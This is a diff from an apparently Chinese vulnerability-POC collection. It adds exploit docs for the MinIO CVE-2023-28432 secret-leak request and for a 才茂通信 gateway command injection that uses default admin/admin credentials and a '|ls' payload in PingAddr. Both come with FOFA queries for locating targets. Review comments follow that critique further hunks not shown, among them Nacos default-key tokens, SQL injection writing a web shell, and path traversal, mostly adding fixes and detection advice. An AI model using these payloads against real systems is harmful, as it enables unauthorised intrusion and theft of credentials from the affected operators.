是一个多云对象存储框架。在从RELEASE.2019-12-17T23-16-33Z开始到RELEASE.2023-03-20T20-16-18Z之前的集群部署中,MinIO存在漏洞发送请求后返回所有环境变量,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,导致信息泄露。分布式部署的所有用户都会受到影响 + +## 漏洞影响 + +``` +MinIO <= RELEASE.2023-03-20T20-16-18Z +``` + +## FOFA + +``` +app="minio" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093052971](images/image-20230417093052971.png) + +验证POC (默认端口:9000) + +``` +POST /minio/bootstrap/v1/verify +``` + +![image-20230417093122553](images/image-20230417093122553.png) \ No newline at end of file diff --git a/服务器应用漏洞/images/image-20230417093052971.png b/服务器应用漏洞/images/image-20230417093052971.png new file mode 100644 index 0000000..664dcef Binary files /dev/null and b/服务器应用漏洞/images/image-20230417093052971.png differ diff --git a/服务器应用漏洞/images/image-20230417093122553.png b/服务器应用漏洞/images/image-20230417093122553.png new file mode 100644 index 0000000..901b1fb Binary files /dev/null and b/服务器应用漏洞/images/image-20230417093122553.png differ diff --git a/网络设备漏洞/images/image-20230417100349175.png b/网络设备漏洞/images/image-20230417100349175.png new file mode 100644 index 0000000..e891ef1 Binary files /dev/null and b/网络设备漏洞/images/image-20230417100349175.png differ 
diff --git a/网络设备漏洞/images/image-20230417100401289.png b/网络设备漏洞/images/image-20230417100401289.png new file mode 100644 index 0000000..7fdb8da Binary files /dev/null and b/网络设备漏洞/images/image-20230417100401289.png differ diff --git a/网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md b/网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md new file mode 100644 index 0000000..9105b84 --- /dev/null +++ b/网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md @@ -0,0 +1,34 @@ +# 才茂通信 网关 formping 远程命令执行漏洞 + +## 漏洞描述 + +才茂通信网关 formping 接口存在远程命令执行漏洞,攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限 + +## 漏洞影响 + +``` +才茂通信 网关 +``` + +## FOFA + +``` +app="CAIMORE-Gateway" +``` + +## 漏洞复现 + +登陆页面,默认口令 admin/admin + +![image-20230417100349175](images/image-20230417100349175.png) + +验证POC + +``` +POST /goform/formping +Authorization: Basic YWRtaW46YWRtaW4= + +PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg= +``` + +![image-20230417100401289](images/image-20230417100401289.png) \ No newline at end of file
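Review bot: in the 泛微OA browser.jsp doc hunk (`@@ -0,0 +1,32 @@`) the 漏洞影响 block lists only `泛微 E-Cology v9` with no patch level or vendor fix reference, so a reader cannot tell whether a given install is already fixed; please add the vendor advisory or patched build next to the FOFA query. Also worth stating in the doc, for detection: the injection reaches `browser.jsp` only after the `keyword` value is URL-decoded three times, so a WAF or log rule that decodes once sees `%25%32%35...` rather than a quote or `union`; the useful indicator is nested percent encoding on `/mobile/%20/plugin/browser.jsp`, together with the unusual `%20` path segment.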
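Review bot: the README hunks `@@ -191,7 +192,9 @@` and `@@ -376,7 +385,6 @@` together move the otter manager entry from the Chinese-name list to the `Alibaba` list, and the same move is applied to the doc itself as a deleted file plus a new file whose body is identical apart from the title line. Consider committing that as a rename (`git mv`) so the file's history stays attached to it; the index entries themselves are inserted in the right sorted positions.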
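Review bot: in the Nacos secret.key doc hunk the POC hardcodes an `accessToken` whose payload segment decodes to `{"sub":"nacos","exp":1698894727}`, i.e. a token that expires in early November 2023, so the request stops working after that date and a reader will misread the failure as "not vulnerable". State in the doc that the token only verifies because it was signed with the shipped default key, and add the remediation the 漏洞描述 implies: enable auth and replace the default token secret in Nacos's application.properties (`nacos.core.auth.default.token.secret.key` in 2.x) with a unique random value.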
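Review bot: typo in the new otter manager doc hunk: "zookper" should read "ZooKeeper". The doc also omits the `## 漏洞影响` section that every other new doc in this commit carries, so the affected otter version is unknown. The 漏洞复现 step (open the element inspector and change the password input's type to text) should be explained as a server-side problem: the stored database passwords are sent to the browser in the HTML regardless of the input type, so the fix is to stop returning stored secrets to the client, and the default `admin/admin` login should be changed in any case.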
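Review bot: the EasyImage down.php doc hunk gives only `EasyImage` under 漏洞影响, with no affected or fixed version, and the 漏洞描述 does not say which check is missing. From the POC, the `dw` parameter of `/application/down.php` is passed to the file read with a caller-supplied relative path (`./config/config.php`); the doc should name `dw` as the unvalidated parameter and list the versions, since that parameter is also what to watch in access logs.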
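Review bot: the EasyImage manager.php doc hunk pastes a raw capture that still carries the author's own session material: the `auth=` cookie (a serialized username `tossone` plus a 32-hex value), a `filemanager=` session id and two Baidu `Hm_lvt_`/`Hm_lpvt_` analytics cookies, and `Content-Length: 1622` no longer matches the trimmed body. Please replace the cookie values with placeholders and fix or drop the stale Content-Length so the request is reproducible and does not leak the tester's credentials. The remark that the login comes from the down.php read is useful; say explicitly that this is an authenticated (后台) issue so its severity is read correctly.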
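Review bot: the Go-fastdfs GetClientIp doc hunk states the root cause well (GetClientIp trusts `X-Forwarded-For`, IsPeer compares that value with `admin_ips`, which defaults to `127.0.0.1`) but says nothing about the fix. Add that a server should only honour forwarded-for headers when the request comes from a trusted reverse proxy that overwrites them, and otherwise use the TCP peer address. The "(可被爆破)" remark next to `admin_ips` is unexplained and should say what is meant. Minor wording: `IsPeer` is a method, not a parameter, in "验证方法为调用 IsPeer 参数".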
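Review bot: the Go-fastdfs upload CVE-2023-1800 doc hunk lists only `Go-fastdfs` under 漏洞影响; please state the affected and fixed releases so readers can distinguish patched servers. The POC shows that the unsanitised field is `path` (a `../../../../../root/.ssh` value is accepted verbatim by `/group1/upload`) together with `filename`; the doc should name these as the parameters that must be canonicalised and confined to the scene directory, which is also what to alert on in upload logs. The screenshot `image-20230417094508409.png` is reused from the GetClientIp doc, which is fine for the same product.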
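Review bot: the 漏洞描述 of the MLflow CVE-2023-1177 doc hunk is a broken machine translation ("用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器") whose main clause has no verb; rewrite it as: users who host the MLflow Model Registry with the `mlflow server` or `mlflow ui` commands on versions earlier than 2.2.1 are affected if they do not restrict who can query the server (cloud VPC, IP allowlisting, or authentication/authorisation middleware). The POC chain also deserves one sentence: `model-versions/create` accepts an arbitrary local `source` (`/etc`) and `get-artifact` then serves files relative to it, so `source` is the parameter to validate. For consistency with the two `POST` requests, mark the third request as `GET`.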
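Review bot: the 瑞友 GetBSAppUrl doc hunk describes a SQL injection that reads data, but the POC is a stacked query with `select ... into outfile` that writes `test7.php` under `C:\Program Files (x86)\RealFriend\Rap Server\WebRoot`, so the impact is code execution and the 漏洞描述 should say so. Add that this second step depends on the application's database account holding the MySQL `FILE` privilege and on `secure_file_priv` being unset; removing that privilege and setting `secure_file_priv` contain the impact even before the injection itself is patched. The POC also leaves a file on the target, which a reproduction procedure should note for cleanup.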
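Review bot: the MinIO CVE-2023-28432 doc hunk contradicts itself on the version range: 漏洞描述 says the issue exists from RELEASE.2019-12-17T23-16-33Z up to but not including (之前) RELEASE.2023-03-20T20-16-18Z, while 漏洞影响 lists `MinIO <= RELEASE.2023-03-20T20-16-18Z`. The fixed release is not affected, so change `<=` to `<` and add the lower bound. The description also limits the issue to cluster (distributed) deployments; the 漏洞复现 section should repeat that next to the default-port remark so single-node results are interpreted correctly.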
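Review bot: in the 才茂通信 formping doc hunk the POC request has no HTTP version and no `Content-Type: application/x-www-form-urlencoded` header, unlike the other captures in this commit, so it cannot be replayed as written; 漏洞影响 also names no device model or firmware version. The doc should state that the injection point is `PingAddr`, which is handed to a shell-backed ping without validation (the `%7C`, i.e. `|`, in the POC is what carries the extra command), so the fix is to validate the value as an IP address or hostname and invoke ping without a shell. It should also spell out that `Authorization: Basic YWRtaW46YWRtaW4=` is just `admin:admin`, which makes changing the default credentials the first mitigation.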